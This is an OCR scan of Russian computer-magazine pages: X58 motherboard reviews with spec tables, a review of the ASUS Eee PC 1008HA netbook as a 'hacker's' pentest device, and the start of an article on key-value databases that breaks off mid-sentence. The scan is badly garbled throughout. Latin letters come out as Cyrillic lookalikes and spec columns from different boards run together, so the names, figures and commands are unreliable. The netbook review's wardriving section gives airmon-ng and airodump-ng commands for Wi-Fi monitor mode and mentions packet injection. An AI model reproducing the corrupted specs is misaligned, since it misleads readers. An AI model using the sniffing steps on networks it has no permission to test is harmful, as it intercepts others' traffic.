ПОДДЕРЖИВАЕМАЯ ПАМЯТЬ: 00 РЗ 800/1 066/1 333/1 600/1 866/2000 М Гц 

поп-ЕСС 

ВІ05: АМІ ВІ05 

СЛОТЫ РАСШИРЕНИЯ: РСІ-ЕхІ 6 (3 шт.), РСІ-Е х8 (2 шт.), РСІ-Ех4(1 шт.) 
ВНУТРЕННИЕ РАЗЪЕМЫ: 24- и 8 -контактный разъемы питания АТХ, 5 
разъемов для питания вентиляторов (из ниходин с поддержкой ШИМ), 
ІЕЕЕ 1394а, 115В 2.0 (3 шт.), ІР, аудио-разъемы для вывода на переднюю 
панель корпуса, СО-іп 

ИНТЕРФЕЙСЫ НАКОПИТЕЛЕЙ: 5АТА 2 0 (6 шт ), 5А5 (2 шт.) 

ПОДДЕРЖКА РАЮ: 0/1 /5/1 0 

РАЗЪЕМЫ НАЗАДНЕЙ ПАНЕЛИ: Р5/2, 5/Р0ІЕ(коаксиальный и оптичес- 
кий), РШ45, 1 ЕЕЕ 1 394а, ИВВ 2.0 (6 шт.), е5АТА(2 шт.), МіпШаскЗ.5 тт (6 
шт.) 



АУДИОКОДЕК: РеаОек АЕС890 
ССЕТЕВОЙ АДАПТЕР: РеаОек РТЕ81 1 1 0Е 



Системная плата А5РоскХ58 Оеіихе — самое недорогое устройство в 
нашем тесте. Следствием этого является наличие в нем только самых 
необходимых компонентов, для излишеств места не нашлось. На плате 
можно увидеть четыре разъема РСІ-Ехргезз 2.0 (каждый по 1 6 линий) 
и три разъема РСІ 2.0, шесть разъемов 5АТА II, по разъему ЮЕ и біорру ; 
на заднюю стенку выведено шесть портов 115В и портЕІ5В\е5АТАдля 
внешних носителей. В разъемы памяти можно воткнуть планки ООРЗ с 
частотой до 1866 МГц включительно. Аесли поднять базовую частоту на 
10 МГц, то плата не будет возражать и против работы с оверклокерской 
памятью 2000 Мгц. Стоит отметить, что в имеющиеся разъемы РСІ-Е и 
РСІ можно вставитьЗ графических адаптера на чипах пѴісІіа (5Ы-массив 
из 3 плат) или 4 видеоплаты на основе решений АТІ (СгоззЕіге-система 
из четырех плат). 



Слово «Реѵоіибоп» в названии этой платы символизирует полный отказ 
от старых решений! Здесь нет не только такихпортов, какЕРТ и СОМ, но 
и достаточно востребованных сегодня РСІ и ЮЕ. В качестве памятника 
старинеты найдешьтолько один Р5/2. Ихзаменяютсовременные реше- 
ния: шесть разъемов шины РСІ-Е 2.0, два порта е5АТА, шесть разъемов 
5АТА II и два комбинированных порта 5АТА\5А5. Для подключения 
последних в комплект поставки входятспециальные переходники, в 
итоге их питание будет осуществляться через стандартный тоіех. Три 
из шести гнезд РСІ-Ехргезз 2.0 могут работать в режиме хі 6 благодаря 
распаянному на плате чипу пѴісІіа пЕогсе 200. 



0 0 

Не удалось измерить температуру северного моста. Хотя в В 105 и реал и- Но два остальных — только в режиме х8, а один в режиме х4. Стоит 

зованы оверклокерские функции, эта системная плата вряд ли подойдет отметить, что плата позиционируется как подходящая, в первую очередь, 

для разгона. для установки в серверы и рабочие станции, то есть для стандартного 

домашнего ПКили оверклокинга она не очень подходит. 
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8100 руб. 



бідаЬуіе 



ЕС5 Віаск 

Х58В-А 



6А-ЕХ58-ЕхІгете 

ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ: 



ТЕХНИЧЕСКИЕХАРАКТЕРИСТИКИ: 

ЧИПСЕТ: северный мост — Іпіеі Х58 Ехргезз, южный мост — I піеі ЮН ЮР 
ПОДДЕРЖИВАЕМАЯ ПАМЯТЬ: РРРЗ 800/1 066/1 333/1 600 М Гц поп-ЕСС 
ВІ05: АМІ ВІ05 

СЛОТЫ РАСШИРЕНИЯ: РСІ (1 шт.І, РСІ-Е хіб (2 шт.], РСІ-Е х4 [1 шт.), 
РСІ-ЕхІ (2шт.) 

ВНУТРЕННИЕ РАЗЪЕМЫ: 24- и 8 -контактный разъемы питания АТХ, 5 
разъемов для питания вентиляторов (из ниходин с поддержкой ШИМ], 
ІЕЕЕ 1394а, 115В 2.0 (3 шт.], I Р, аудио-разъемы для вывода на переднюю 
панель корпуса, СР-іп, I ЕЕЕ 1 394а, 5/РОІЕ, 

ИНТЕРФЕЙСЫ НАКОПИТЕЛЕЙ: 5АТА 2 0 (6 шт ], е5АТА2 шт 
Поддержка ПАЮ: 0/1/0+1/5 

РАЗЪЕМЫ НАЗАДНЕЙ ПАНЕЛИ: Р5/2, РШ45, ІЕЕЕ1394а, 115В 2.0 (6 шт.), 
е5АТА(2 шт.), МіпіЗаскЗ.5 гшгп (6 шт.) 

АУДИОКОДЕК: РеаОек АЮ8885-ѴС 

СЕТЕВОЙ АДАПТЕР: РеаОек РП81 1 1 С 



ЧИПСЕТ: северный мост— Іп1:еІХ58 Ехргезз, южный мост— Іпіеі ІСН10Р 
ПОДДЕРЖИВАЕМАЯ ПАМЯТЬ: БОРЗ 800/1 066/1 333/2100+ М Гц поп- 
ЕСС 

ВІ05: Аѵѵагсі В 105 

СЛОТЫ РАСШИРЕНИЯ: РСІ (2 шт.), РСІ-Е хіб (2 шт.), РСІ-ЕхІ (1 шт.), 
РСІ-Е х4 (1 шт.], РСІ-Е х8 (1 шт.) 

ВНУТРЕННИЕ РАЗЪЕМЫ: 24- и 8 -контактный разъемы питания АТХ, 4 
разъемов для питания вентиляторов (из ниходин с поддержкой ШИМ), 

I ЕЕЕ1 394а (2 шт.), 115В 2.0 (2 шт.), аудио-разъемы для вывода на пере- 
днюю панель корпуса, СО-іп 

ИНТЕРФЕЙСЫ НАКОПИТЕЛЕЙ: 5АТА 2.0 (10 шт.], ЮЕ, Еіорру 
Поддержка РАЮ: 0/1/5/10 

РАЗЪЕМЫ НАЗАДНЕЙ ПАНЕЛИ: Р5/2, 5/Р0ІЕ(коаксиальный и опти- 
ческий], РШ45 (2 шт.), I ЕЕЕ1 394а, 115В 2.0 (8 шт.], МіпШаск 3.5 гшгп (6 шт.) 
АУДИОКОДЕК: РеаОек АЮ889А 

СЕТЕВОЙ АДАПТЕР: РеаОек РП81 1 1 0 



Еще одна бюджетная системная плата. Несмотря на это, имеет множес- 
тво функций, аналогичныхтем, что естьу куда более дорогихустройств. 
Это, например, ЖК-дисплей, отображающий Р05Т-коды, кнопки Роѵѵег 
и Резеі;, распаянные на системной плате, кнопка сброса настроек ВІ05, 
два встроенных сетевых адаптера и мощная система охлаждения, состо- 
ящая изтрех радиаторов, связанных между собойтепловымитрубками. 
Комплект поставки системной платы никак нельзя назвать бедным. В 
него входят кабель е5АТА, а также планка расширения с двумя портами 
Э5В и портом ЕігеѴѴіге. Парк разъемов представлен двумя гнездами 
шины РСІ-Ехргевв 2.0 хі 6, гнездом РСІ 2.0, одним разъемом РСГЕхргевв 
х4 и одним РСІ Ехргеввхі . 



Плата сразу привлекает ксебе внимание необычным внешним видом, 
который возникблагодаря применению на ней водоблока (на северном 
мосту], а также системы охлаждения чипсета и элементов питания про- 
цессора. Последние, кстати, это фирменная фишка компании ОідаЬуІе, 
применяемая на матплатах серии II и га ОигаЫеЗ. Благодаря всем этим 
девайсам, а также дополнительному радиатору из комплекта поставки, 
плату можно смело использовать для оверклокинга. Крометого, продви- 
нутым пользователям придется по вкусу наличие на плате кнопок Роѵѵег 
и РезеС дисплея с Р05Т-кодами, индикаторов, помогающих понять, что 
же не работает, а также кнопка сброса ВІ05. Если твой музыкальный и 
видеоархив огромен, то 10 портов 5АТА2.0 помогут решить эту проблему. 
В дополнение ко всему, эта системная плата поддерживает стандарт 
питания ІпІеІѴРБ 1 1.1 



0 

Основной недостаток платы является прямым следствием ее бюджетной 
направленности — установить более двух графических адаптеров у тебя 
никакие получится. 



0 

Обратной стороной наличия на плате мощной системы охлаждения 
сталото, что она немного мешаетустановке длинных плат в разъемы 
РСІ-Ехргезз. 
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ТЕХНИЧЕСКИЕХАРАКТЕРИСТИКИ: 

ЧИПСЕТ: северный мост — ІпІеІХ58 Ехргезз, южный мост — Іпіеі ЮН ЮР 



ПОДДЕРЖИВАЕМАЯ ПАМЯТЬ: йОРЗ 800/1 066/1 333/1 600 М Гц поп-ЕСС 

ВЮ5 АМІВЮ5 ТЕХНИЧЕСКИЕХАРАКТЕРИСТИКИ: 

СЛОТЫ РАСШИРЕНИЯ: РСІ (1 шт.І, РСІ-Е хіб (2 шт.І, РСІ-Е х4 (1 шт.) ЧИПСЕТ: северный мост- ІпІеІХ58 Ехргезз, южный мост- ІпІеІІСНЮР 



ВНУТРЕННИЕ РАЗЪЕМЫ: 24- и 8-контактный разъемы питания АТХ, 

5 разъемов для питания вентиляторов (из них 2 с поддержкой ШИМ], 
ІЕЕЕ1 394а, 115В 2.0 (2 шт.] р ІР, аудио-разъемы для вывода на переднюю 



ПОДДЕРЖИВАЕМАЯ ПАМЯТЫРОВЗ 800/1066/1333/1600 МГцпоп-ЕСС 
ВІ05: АМІ ВІ05 

СЛОТЫ РАСШИРЕНИЯ: РСІ (2 шт.], РСІ-Е хі 6 (Зшт.), РСІ-Е хі 



панель корпуса 

ИНТЕРФЕЙСЫ НАКОПИТЕЛЕЙ: 5АТА 2 0 (6 шт.) 

ПОДДЕРЖКА РАЮ: 0/1 /5/1 0 

РАЗЪЕМЫ НАЗАДНЕЙ ПАНЕЛИ: 5/РОІЕ (оптический), ВЮ45, 

I ЕЕЕ1 394а , 115В 2.0 (8 шт.), е5АТА (2 шт.], МіпЕІаск 3.5 шт (6 шт.) 
АУДИОКОДЕК: Реаііек АЕС889 
СЕТЕВОЙ АДАПТЕР: Пеаііек РП81 1 1 0 



ВНУТРЕННИЕ РАЗЪЕМЫ: 24- и 8 -контактный разъемы питания АТХ, 6 
разъемов для питания вентиляторов (из них один с поддержкой ШИМ], 
ІЕЕЕ1 394а, 115В 2.0 (2 шт.] 

ИНТЕРФЕЙСЫ НАКОПИТЕЛЕЙ: 5АТА 2.0 (10 шт ], ЮЕ 
ПОДДЕРЖКА РАШ: 0/1/5/ЮШСЮ, ІпІеІМаІгіхЗІогаде 
РАЗЪЕМЫ НАЗАДНЕЙ ПАНЕЛИ: Р2/2, ГМ-45(ЕІЬегпеі] - 2 шт., 

ІЕЕЕ1 394а, УЗВ 2.0 (8 шт.], е$АТА- 2 шт. 



О 



АУДИОКОДЕК: в комплекте поставляется дискретная звуковая карта 

Сгеаііѵе 5оипсІ ВІазІегХ-Еі Хігете Аисііо 

СЕТЕВОЙ АДАПТЕР: Веаііек 81 1 1 С (1 0/1 00/1 000 Мбит/с] - 2 шт. 



Компания Іпіеі, как производитель чипсета, на котором построена ееже 
системная плата, может позволить себе отступить от классической схемы 
компоновки подобныхустройств.Уданной платы гнездо для ЦП нахо- 
дится ниже, чем мы привыкли его обычно видеть, а над ним распаяны 
разъемы для памяти (4 штуки]. Крометого, северный мост примостился 
не снизу от процессора. Порты Р5/2 вендор предал анафеме, разместив 
вместо нихдва разъема е5АТА. Разъемам ЮЕ места на этой плате также 
не нашлось, вместо них нам предложены шесть 5АТА- по ртов. Крометого, 
есть пара разъемов РСІ-Ехргезз хі , два порта РСІ-Ехргезз хі 6 и один х4. В 
комплект поставки устройства входит вентилятор, который предназначен 
для установки на северный мост. Он понадобится тем, кто воспользуется 
уникальной функцией местной В 105, которая позволяет вручную устано- 
вить максимальную мощность процессора (Роѵѵег51оре), потому что по 
умолчанию плате вполне хватало и имеющегося пассивного охлаждения. 
Есть в ВІ05’е и другие интересные энтузиастам функции. 

0 

Возможно, тебе будет не хватать четырех разъемов для памяти, особенно 
учитывая, что цена на этот компонент постоянно снижается, а необхо- 
димость в нем увеличивается. На долговечности и надежности работы 
данной системной платы, особенно при активном оверклокинге, может 
отразиться наличие конденсаторов сжидким электролитом. 




Очень необычная и функциональная системная плата. Уже то, что в ней 
нет встроенного аудиокодека, а в комплекте поставки идетзвуковая 
плата Сгеаііѵе 5оипб ВІазІегХ-Еі Хігете Аисііо, выделяет ее из ряда 
подобных. Крометого, в коробке ты найдешь специальное энергосбе- 
регающее устройство ОгеепРоѵѵегОепіе, которое ты сможешь включить 
через ВІ05 и контролировать с помощью специального ПО М5І. На плате 
распаяно 10 разъемов 5АТА, 2 порта е5АТА\ЕІ5В присутствуют на задней 
панели. Имеющийся графический дисплей умеет отображать не только 
Р05Т-коды, но и другую информацию, к примеру, температуру. Также 
плата хорошо подходит для оверклокинга. 

0 

Несмотря на все навороты, системная плата обладает серьезной 
проблемой — несовместимость со многими модулями памяти (даже с 
теми, на которых есть отметка о совместимости с процессорами Іпіеі 
Соге І7). Наиболее ярко это проявилось при попытке установить модули 
производства 0С2. Такчто перед тем, каккупить память, которую ты пла- 
нируешь сюда установить, загляни на сайт М5І, посмотри, какую память 
рекомендует сам вендор. 



выводы 

Тестируя платы на проверенном време- 
нем чипсете, можно делать определенные 
выводы, не боясь, что какие-то вещи зависят 
от детских болезней НМ С. Сегодня награду 
«Выбор редакции» получает плата СідаЬуІе 
6А-ЕХ58-Ех1гете, — это достойный выбор 



для настоящего энтузиаста оверклокинга. 
«Лучшая покупка» присуждается плате Іпіеі 
0X58, которая является лучшим бюджетным 
решением в нашем тесте. Крометого, хотелось 
бы отметить платы А5ЕІ5 Р6Т6 ѴѴ5 Пеѵоіиііоп и 
М5І Есіірзе 5ИІ . Они обе обладают выдающим- 
ся функционалом, и все будетзависеть оттого, 



что тебе важнее. Плата АСІЮ имеет интерфейс 
5А5 и дополнительный чип пѴібіа пЕогсе 200 
— довольно редкий случай. Устройство от М5І 
манит входящей в комплект поставки диск- 
ретной звуковой платой, многофункциональ- 
ным информационным дисплеем и десятью 
разъемами 5АТА. Выбор за тобой . ~а~ 
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А51І5 



ЕееРС 1008НА 



Нетбук для хакера 

Когда мы говорим об инструментах для пентеста, то зачастую имеем 
в виду различныеХ-ТооІг’ы. Но без подходящего девайса, на который 
можно было бы установить весь необходимый софт и всегда носить 
с собой, не обойтись. В качестветакого инструмента отлично подхо- 
дит нетбук А51І5 Еее РС 1008НА. 

Увидев нетбук, многие, возможно, заметят: «Ого, такой тонкий!». 

Внешний вид действительно впечатляет: толщина корпуса состав- 
ляет от 1 8 мм в тонкой части до 25,7 мм в самой толстой. К тому же, он 
совсем не похож на обычные скромные нетбуки. Вместо привычного 
спартанского внешнего вида у Еее РС 1 008Н А приятный дизайн с 
лакированной поверхностью. И хотя приятно, что на твою машинку 
обращают внимание в кафе, выбирали мы его по другой причине. 

Для нас намного интереснее то, что при весе в 1 .1 кг, мы получаем 
полноценную клавиатуру, 1 0 " дисплей и 6 часов автономной работы 
при «шустрой» производительности. 

УДОБСТВО РАБОТЫ 

Несмотря на миниатюрную толщину, инженерам из А51ІЗ удалось ре- 
ализовать практически полноценную клавиатуру. Я пробовал писать 
код на ранних моделях Еее РС, но на большее, чем небольшой скрипт 



на РуіНоп’е, меня не хватало. Набирать текст на маленьких клавишах 
очевидно неудобно. В 1 008НАже используется плиточный стиль 
клавиатуры с клавишами, привычными по размеру и приятными по 
тактильным ощущениям. Ктомуже, была проработана эргономика 
клавы: вдвое сократив по высоте клавишу вертикального курсора, 
удалось сделать правый 5Ы?і нормальным по размеру. В результате, 
на небольшой машинке я могу печатать стем же успехом, что и на 
обычном ноутбуке с диагональю 14" . 

ШУСТРЫЙ КОНФИГ 

Получив в распоряжение достаточно большой экран (разрешение 
— 1 024 х 600] и удобную клаву, подчас забываешь, что дело имеешь с 
нетбуком. И вскоре сталкиваешься с ограничениями — имеющийся 
в распоряжении гигабайт памяти не самым лучшим образом тянет 
тяжелые проекты Ѵізиаі 5Ти сі і о или Есіірзе. Это особенно чувствуется 
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в момент компиляции. Но, к счастью, никто и не собирается использо- 
вать Еее РС в качестве основной рабочей лошадки, а для того чтобы 
подлатать код, добавив изменения в 5ѴІ\І-репозитарий, возможностей 
нетбука хватит сполна. Замечательнейшим образом будут чувствовать 
себя и различные сканнеры безопасности вкупе с другими инстру- 
ментами для пентеста. Ну... за исключением того случая, когда тебе 
взбредет в голову брутить на таком девайсе хеши :). 

По меркам подобныхустройств модель 1 008НА является одной из са- 
мых продвинутых. В основе этого Еее РС лежитхорошо зарекомендо- 
вавшая себя платформа I пііеі на базе процессора Аіот. Модель имеет 
процессор Аіот N280 с частотой 1 ,66 ГГц, 1 Гб оперативной памяти и 
160 Гб жесткий диск. Предустановленная ѴѴіпсіоѵѵбХР Ноте работа- 
еточень шустро, но мы-то знаем, что ѴѴіпсІоѵѵз 7 будет работать еще 
быстрее. Реіеазе-сапсіісіаіе системы, который МісгозоД распростра- 
няет на время тестирования бесплатно, установилась без каких-либо 
проблем. При том, что никаких драйверов, кроме как для тачпада с 
функцией мультитача, устанавливать не потребовалось. 

ВОЗМОЖНОСТИ ДЛЯ ѴОІР 

Самый большой плюс нетбука — то, что его всегда можно взять с со- 
бой. Обычно в сумке всегда валяется обычный ноутбук на 13”, но две 
недели я с удовольствием использовал тестовую модель 1008 НА, в том 
числе во время поездки в Испанию. Этоттекст, к примеру, я набирал 
в аэропорту Барселоны. Если ты до сих пор не осознал прелести 
ѴоІР-связи и видеоконференций, рекомендую срочно попробовать их 
во время первой же покупки устройства. Чтобы не оплачивать дикие 
счета за роуминг, мы в і всегда звоним через 5ІР или Зкуре. Приятно 
удивила встроенная камера на 1 .3 Мегапикселя во время видео- 
звонков, которая давала очень качественную картинку, а встроенный 
микрофон отлично фильтровал шумы. Позже выяснилось, что модель 
сопровождается стерео-микрофоном, а не примитивным моно, как 
у большинства нетбуков. Эксперимента ради я подключил к нетбуку 
и В Іи еІюоіЬ- гарнитуру. Встроенный модуль ВІиеІооіЬ 2.1 с ЕБР без 
проблем распознал ее. 

СКОЛЬКО ДЕРЖИТ БАТАРЕЙКА? 

Но одной только удобной клавиатуры для комфортной работы 
явно мало. Для меня, как человека достаточно часто летающего 
и работающего вне дома и офиса, крайне важным является еще 
и время работы. В этом плане новинку 1 0 0 8 Н А я ждал давно, и 
среди всех остальных строчек в описании конфигурации сердце 
грело заявленное время автономной работы — до 6 часов без 
подзарядки. С учетом установленной в нетбук трехэлемент- 
ной литий-полимерной батарейки емкостью всего 2,900 мАч 
(которую, увы, невозможно поменять без помощи сервисного 
центра) это больше попахивало маркетинговой заманкой, чем 
адекватными данными. К счастью, это тот случай, когда ты при- 
ятно ошибаешься, и это стало очевидно прямо в момент первого 
использования. 

Через два часа воспроизведения видео заряд все еще составлял 65%, 
а за час работы с отладчиком и редактором кода Котобо ЕсІ И: система 
съела всего 1 5% батарейки. В среднем, время работы в режиме 
«максимальной производительности» составляет примерно 4,5-5 ч. 
Используя другие режимы и меньшую яркость экрана, можно легко 
получить дополнительный часик, а иногда и больше. Очень здорово. 
Возникает вопрос — за счет чего удалось достичь столь внушитель- 
но го времени автономной работы с довольно скромным аккумуля- 
тором? Одна из причин — использование в качестве процессора 
Іпіеі Аіот N280, который в ближайшее время обещает статьхитом 
на рынке нетбуков. Одноядерный чипе тактовой частотой 1 ,66 
ГГц поддерживает системную шину667МГци работает в связ- 
ке с чипсетом I п!:е I О N 40. Та кой симбиоз не сильно увеличивает 
производительность по сравнению с традиционным N270, но зато 
позволяет серьезно продлить время работы нетбука от батарей за 
счет экономичности. 



ПРОВЕРКА НА ПРОФПРИГОДНОСТЬ 

Проверить нетбук в действии хотелось именнотам, где он может 
показать себя во всей красе — во время вардрайвинга. Ведь лучшего 
инструмента, чем нетбук, для пентеста вай-фай не найти. Задачу 
делает разрешимой то, что в основе Еее РС 1 008НА лежит платформа 
I пТеІ. Не секрет, что для работы такихутилит как Кізтеі или Аігосгаск 
подойдет далеко не каждый адаптер. Тот должен поддерживать режим 
МопТогіпд Мобе, а также режим инжектирования пакетов. По этой 
причине еще некоторое время назад пришлось бы покупать беспро- 
водные адаптеры нужных производителей — теперь практически 
любой встроенный ѴѴі-Еі чип на Іпіеі’овской платформе отлично спра- 
вится сзадачей. И модель 1008НА, ксчастью, не исключение. 

В качестве платформы для экспериментов мы выбрали Иі п их 
Васк1:гаск4, который без проблем загрузился с флешки без каких- 
либотанцев с бубном (что уже приятно). Правда, для работы утилит 
необходимо подключить нужный модуль для ядра, но я тебе подскажу 
рабочие настройки: 

тосІргоЪе аЩі9к 
аігтоп-пд зСагС ѵ^ІапО 
аігосіитр-пд мІапО 

После запуска снифера фреймы ѴѴі-Еі, перехваченные с «воздуха» 
аігобитр’ом, не заставят себя долго ждать. Режим мониторинга, 
позволяющий перехватывать пакеты, работает«на ура». С инжекцией 
пакетов в сеть, а именно с этим зачастую возникают проблемы, также 
без труда справиласьутилита аігсгаск-пд. 

ВЗЯТЬ НА ВООРУЖЕНИЕ! 

Что ни говори, а новая модель Еее РС производства А5ЕІ5 получилась 
удачной. В одном девайсе уживается стильный нетбук со смехот- 
ворным весом и в то же время — шустрая машинка, которую удобно 
использовать в качестве рабочей лошадки. За счет использования 
нового процессора удалось серьезно сократить энергопотребление, 
чем разработчики и воспользовались, уменьшив емкость аккумуля- 
тора. Еще один плюс нетбука — его мизерный вес. Что получилось в 
итоге? Супер! 

Подробнее о нетбуках А5ЕІ5 и других гаджетах ты можешь узнать в 
новом дискуссионном сообществе на ІгепсІсІиЬ.ги . т 




ТРЕМРСШВ 



ТРЕЫО СШВ — дискуссионный клуб для тех, кто интересуется про- 
грессом и задумывается о будущем. Участники Тгепб С Іи Ь обсуждают 
технические новинки, информационные технологии, футурологию и 
другие темы завтрашнего дня. Тгепб С Іи Ь поддерживается ком- 
паниями Іпіеі и А5ЕІ5 и проводит регулярные конкурсы с ценными 
призами. 

Корпорация ІШеІ, ведущий мировой производитель инновационных полупро- 
водниковых компонентов, разрабатываеттехнологии, продукцию и инициати- 
вы, направленные на постоянное повышение качества жизни людей и совер- 
шенствование методов их работы. Дополнительную информацию о корпорации 
ІгДеІ можно найти на ѴѴеЬ-сервере компании Іпіеі ѵѵѵѵѵѵ.іпЩІ.ги . атакже на сайте 
ЬЦрУ/Ыодз.іпІеІ.сот . Для получения дополнительной информации о рейтинге 
процессоров Іпіеі посетите сайт ѵѵѵѵѵѵ.іпШІ.ги/гаІіпа . 
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ДА ПОШЕЛ ТЫ, ЗОИ 

КАК ОТКАЗАТЬСЯ ОТ БАЗ ДАННЫХ И ВЫИГРАТЬ 

Но как же без него? Если нет привычной базы данных 5СН_ Р то что? Вот, 
что я тебе скажу. Первым кинь камень втого, кто скажет, что в боль- 
шом проекте без 50Е не обойтись. Обойтись можно. И при этом — не- 
кисло выиграть! 



Скажи честно , тебе ведь интересно, как 
устроены изнутри те суперпроекты, на кото- 
рых висишь сутками ты и еще сотни миллио- 
нов пользователей сразу? Ооодіе, Атагоп, 
еВау, ТѵѵіІЧег, тот же РасеЬоок или наш 
ВКонтакте? Они совсем не похожи на боль- 
шинство обычных веб-сайтов, написанных на 
РНР+туЗОЕ. База данных в них — все. Там и 
новости, и информация о товарах в интернет- 
магазине, и статьи с комментариями в блоге, 
и самое вкусное — логины и пароли. 

БАЗА ДАННЫХ — 

ВШИРЬ И ВВЫСЬ 

Очень многие разработчики и архитекторы 
также думали, что без базы не обойтись, 
продолжая создавать все более мощные 
сайты. Но вскоре столкнулись с тем, что 
сколько ни тужься, какие только хаки и 
умные штуки ни придумывай — 
при нагрузке в сто миллионов пользова- 
телей, базы данных все равно мрут, как 
мухи. Ребята тоже слышали о кластерах, 
и о распределенных системах и даже об 
облачных вычислениях (подробнее читай 
статью «Заоблачные вычисления» в #125 
номере т Е Если надо, чтобы больше людей 
скачали новый порно-ролик с Берковой, 



достаточно поставить еще пару серверов и 
скопировать на них файлы. 

А вот базы данных так просто не работают. 

Вот тут-то и нарисовалась проблема масшта- 
бирования. Каждый решает ее по-своему. 
Сначала ставят второй сервер: с него при- 
ложение читает данные, записывая только 
на первый, а он уже сам, в фоновом режиме, 
переносит новые данные. Такая архитектура 
называется тазіюг-зіаѵе, но ничего связан- 
ного с ВБЗМ здесь нет! 

Позже можно доставить еще сервер, и еще, 
но это уже не поможет, если писать надо 
много и постоянно. Ведь каналы между сер- 
верами рано или поздно будут забиты так, что 
новые данные будут появляться на подчинен- 
ных узлах гораздо позже, чем это допустимо. 

А кому интересно ждать, пока его коммента- 
рий появится на странице (самые нетерпе- 
ливые тупо жмут рефреш, чем еще сильнее 
нагружают систему)? Светлые умы подумали 
и решили: а что, если все базы данных будут 
сразу главными? У тебя есть три сервера, 
и на каждом из них — вся информация, а 
приложение случайно или по определен- 
ному алгоритму выбирает, с каким сервером 
работать. Изменения на одном сервере сразу 
передаются на два других (это называется 



плазме г- спазме г или ллиШ-ллазІел реплика- 
ция), и в любой момент везде есть самые 
последние данные, при этом писать и читать 
информацию можно с любого сервера. Но тут 
одна сложность — у самых популярных баз 
эта функция появилась только недавно, да и в 
настройке и поддержке очень уж сложная. И 
не дай бог, придется восстанавливать данные 
или потерянные транзакции — тут вообще без 
пива не разберешься. Ну и, конечно, до бес- 
конечности наращивать количество серверов 
также нельзя. Все будет неплохо, пока не 
дойдешь до десятка. А там не оберешься про- 
блем с взаимной связью и трафиком внутри 
такого хозяйства. А результат тот же — мед- 
ленно и ненадежно. 

СКАЖИ ТВЕРДОЕ 
«НЕТ» 50Ь-У! 

А тем временем сайты растут, пользователей 
становится все больше, счет идет уже на 
десятки миллионов. Что же делать? А вот что 
— отказаться от обычной базы данных! Ведь 
что такое база данных? Это специальное хра- 
нилище данных (обычно это просто файлы, но 
с собственной структурой и кешем в памяти) с 
движком, который принимает от тебя команды 
в виде языка 5СИ (например, на выборку дан- 
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ных] и выполняет их. 

Особенно достают кривые руки разработчика 
или админа, когда для самого простого запро- 
са «а сколько юзеров у меня на странице?» 
приходится тупо перебирать весь список 
пользователей и проверять, у кого статус 
«онлайн». Ведь юзеров может быть реально 
много, а если ты еще не озаботишься пра- 
вильными индексами, то на каждый такой 
запрос придется серверу доставать всю 
табличку с данными (а это может и гигабайт 
быть) и считать снова и снова. А если в этот 
момент Вася скинул своим френдам в ЖЖ 
ссылку на твой суперпроект и пришла еще 
тысяча юзеров, каждого из которых надо 
записать в базу? Все — капут серверу! 

Все потому что и базы данных, и язык 501, 
которым эти данные выбираются, достаточно 
плохо приспособлены к масштабированию. 

То есть, пока один-два сервера, все будет окей. 
Но как только больше — начинаются проблемы. 
Нельзя добавить еще машинку и гарантиро- 
ванно заставить работать все быстрее. В Гугле 
это давно поняли и изобрели свое решение, 
полностью отказавшись от применения таких 
обычных баз данных. Но это Гугл со своими 
ноу-хау, а что делают остальные? Остальные 
используют кеу-ѵаіие сІаІіаЬазе! 

По сути, это максимально упрощенная база 
данных. Скорее, даже просто хранилище, где 
все данные сведены к обычной паре: ключ 
(или индекс) и сами данные, которые обычно 
представляют собой строку и — в некоторых 
случаях — числа. То есть, вся база данных — 
это просто список ключей и сопоставленных 
с ними строк данных. Что именно хранится 
в такой базе, ей совершенно неважно — это 
забота самого приложения. 



Интерфейс доступа к такой базе также мак- 
симально прост — обычно это простейшие 
команды типа деі (получить данные по ключу), 
зе* (записать данные с ключем), сіеіеіе (уда- 
ляет ключ и его данные), ирсіаіе (обновляет 
уже существующие данные). 

Самым главным преимуществом является то, 
что если правильно все сделать, сложность 
таких операций (то есть, время вычисления 
результата) будет заранее известна и не зависит 
от объема данных или количества серверов. 
Более того, операции обычно атомарные (в 501- 
базах данных это называется транзакциями). 

Т.е., задавая команду, ты можешь быть уверен- 
ным, что она либо успешно отработает, либо 
сразу вернет ошибку — при этом другие поль- 
зователи не помешают тебе, даже если будут 
пытаться сделать то же самое. 

Это самый обычный тип кеу-ѵаіие баз данных. 
Подобных проектов существует много, но 
отличаются они, как правило, типами данных, 
возможных для хранения— например, кроме 
строк можно хранить числа или двоичные 
объекты (ВБОВ-ы), — а также количеством 



команд-операций. Понятно, что описанные 
выше четыре операции самые простые, обыч- 
но поддерживается еще инкременент/декре- 
мент (счетчик в памяти); особо продвинутые 
могут хранить массивы и списки. 

На низком уровне такие базы строятся на 
базе хеш-таблиц и их разновидности — рас- 
пределенной хеш-таблицы (ЭНТ). Это просто 
обычная, хоть и большущая таблица, которая 
может автоматически распределяться на 
любое количество компьютеров и поддер- 
живает поиск и получение знания, где дан- 
ные конкретно (такой принцип, в частности 
используется для бессерверного обмена 
пирами во время скачки файла через Іоггепі). 
И хотя обычно для быстрой работы данные 
хранятся в оперативной памяти, некоторые 
сервера обеспечивают хранение на диске и 
бекап, так что после выключения такого сер- 
вера все данные сохраняются. 

СВЕТЛЫЕ И ТЕМНЫЕ 
СТОРОНЫ СИЛЫ 

Сильная сторона таких решений — масштаби- 
руемость и скорость. Свойства БИТ такие, что 
можно присоединять новые сервера посто- 
янно, и база будет расти и расти. Столько — 
сколько надо. При этом в самих приложениях 
ничего менять не нужно, все делается авто- 
матически! Скорость очень и очень высокая, 
так как практически все такие базы работают 
в памяти, а на диск пишется лишь бекап (при 
этом, он может быть постоянным — в таком 
случае в него записывается только новая 
инфа). Показатели в сотни тысяч запросов в 
секунду на одном дохленьком сервере — это 
обычное дело для таких баз. 

Но, несмотря на восторги, есть и сложности. 
Первая — это скудность возможностей работы 
с данными. Ага, вот и расплата за скорость и 
расширяемость! Сервер знает только ключ и 
данные, которые с ним ассоциированы, а вот, 
что это за информация — номер кредитной 
карточки или дата регистрации — уже не 
ведает. Этим должно заниматься само при- 
ложение! Поэтому просто взять и, например, 
написать один 50І_-запрос, чтобы выбрать 
всех пользователей, которые регистрирова- 
лись год назад и совершили больше одного 
платежа за это время, уже не получится. 

В базе просто нет возможности выборки по 
какому-либо признаку, кроме ключа. Но не 



Совет №1. Начинай утро с зарядки! 

Да-да, это касается не только твоего 
телефона, но и тебя лично. Если нужна 
веселуха, купи ѴѴіі НТ мы пробовали - рабо- 
тает безотказно. Только мышцы 
на следующее утро болят - зато сразу 
чувствуешь, что прокачался! 
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спеши отворачиваться — это ограничение легко реша- 
